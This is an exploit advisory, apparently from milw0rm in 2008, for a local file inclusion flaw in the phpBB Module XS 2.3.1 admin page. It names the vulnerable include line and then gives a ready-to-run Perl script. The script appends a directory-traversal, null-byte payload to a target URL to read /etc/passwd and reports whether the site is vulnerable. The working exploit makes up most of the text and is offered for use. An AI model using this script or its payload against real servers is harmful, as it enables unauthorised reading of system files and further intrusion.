61 lines
No EOL
1.8 KiB
Text
61 lines
No EOL
1.8 KiB
Text
..%%%%....%%%%...%%..%%...........%%%%...%%%%%...%%%%%%..%%...%%.
|
|
.%%......%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%...%%.
|
|
..%%%%...%%..%%..%%%%%%..%%%%%%..%%......%%%%%...%%%%....%%.%.%%.
|
|
.....%%..%%..%%..%%..%%..........%%..%%..%%..%%..%%......%%%%%%%.
|
|
..%%%%....%%%%...%%..%%...........%%%%...%%..%%..%%%%%%...%%.%%..
|
|
.................................................................
|
|
|
|
[+] Software: phpBB Module XS 2.3.1
|
|
[+] Vendor: http://www.phpbbmods.de
|
|
[+] Download: http://www.phpbbmods.de/downloads.php?view=detail&id=3
|
|
|
|
[~] Vulnerability found by: bd0rk
|
|
[~] Contact: bd0rk[at]hackermail.com
|
|
[~] Website: http://www.soh-crew.it.tt
|
|
[~] Greetings: str0ke, TheJT, maria
|
|
|
|
[+] Vulnerable Code in /admin/admin_xs.php line 33
|
|
[+] Code: include_once('xs_include.' . $phpEx);
|
|
[+] It is a local file inclusion
|
|
|
|
[+]Exploitcode:
|
|
|
|
use LWP::UserAgent;
|
|
use HTTP::Request;
|
|
use LWP::Simple;
|
|
|
|
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
|
|
print "\t\t+ +\n\n";
|
|
print "\t\t+ phpBB Module XS 2.3.1 Local File Inclusion Expl +\n\n";
|
|
print "\t\t+ +\n\n";
|
|
print "\t\t+++++++++++++++++++++++++++++++++++++++++++++++++++\n\n";
|
|
|
|
if (!$ARGV[0])
|
|
{
|
|
print "Usage: expl.pl [target]\n";
|
|
print "Example: expl.pl http://127.0.0.1/directory/admin/\n";
|
|
}
|
|
|
|
else
|
|
{
|
|
$web=$ARGV[0];
|
|
chomp $web;
|
|
|
|
$file="admin_xs.php?phpEx=../../../../../../../../../../../../../../../../etc/passwd%00";
|
|
|
|
my $web1=$web.$file;
|
|
print "$web1\n\n";
|
|
my $agent = LWP::UserAgent->new;
|
|
my $req=HTTP::Request->new(GET=>$web1);
|
|
$doc = $agent->request($req)->as_string;
|
|
|
|
if ($doc=~ /^root/moxis ){
|
|
print "This is vulnerable\n";
|
|
}
|
|
else
|
|
{
|
|
print "It is not vulnerable\n";
|
|
}
|
|
}
|
|
|
|
# milw0rm.com [2008-03-24] |